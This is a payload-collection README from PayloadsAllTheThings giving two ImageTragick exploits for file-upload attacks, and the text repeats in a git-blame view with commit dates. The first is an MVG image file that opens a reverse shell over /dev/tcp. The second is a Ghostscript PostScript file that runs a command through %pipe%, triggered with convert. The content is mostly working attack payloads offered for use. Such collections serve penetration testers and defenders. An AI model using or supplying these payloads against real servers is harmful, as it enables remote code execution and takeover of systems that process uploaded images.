PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik/README.md

# Image Tragik 1 & 2


## Exploit v1

Simple reverse shell

```powershell
push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context
```

## Exploit v2

Simple `id` payload

```powershell
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
```

then use `convert shellexec.jpeg whatever.gif`

## Thanks to

* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
File upload - merging old files 2019-02-15 15:00:50 +00:00			`# Image Tragik 1 & 2`
ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 19:42:25 +00:00
File upload - merging old files 2019-02-15 15:00:50 +00:00
			`## Exploit v1`

			`Simple reverse shell`

			```powershell
			`push graphic-context`
			`encoding "UTF-8"`
			`viewbox 0 0 1 1`
			`affine 1 0 0 1 0 0`
			`push graphic-context`
			`image Over 0,0 1,1 '\|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'`
			`pop graphic-context`
			`pop graphic-context`
			```

			`## Exploit v2`
ImageTragick v2 + Angular 1.6+ XSS 2018-08-22 19:42:25 +00:00
			Simple `id` payload

			```powershell
			`%!PS`
			`userdict /setpagedevice undef`
			`save`
			`legal`
			`{ null restore } stopped { pop } if`
			`{ legal } stopped { pop } if`
			`restore`
			`mark /OutputFile (%pipe%id) currentdevice putdeviceprops`
			```

			then use `convert shellexec.jpeg whatever.gif`

			`## Thanks to`

			`* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)`